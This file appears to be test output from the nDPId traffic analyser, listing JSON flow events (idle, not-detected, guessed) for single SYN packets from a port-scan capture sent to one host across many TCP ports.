+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 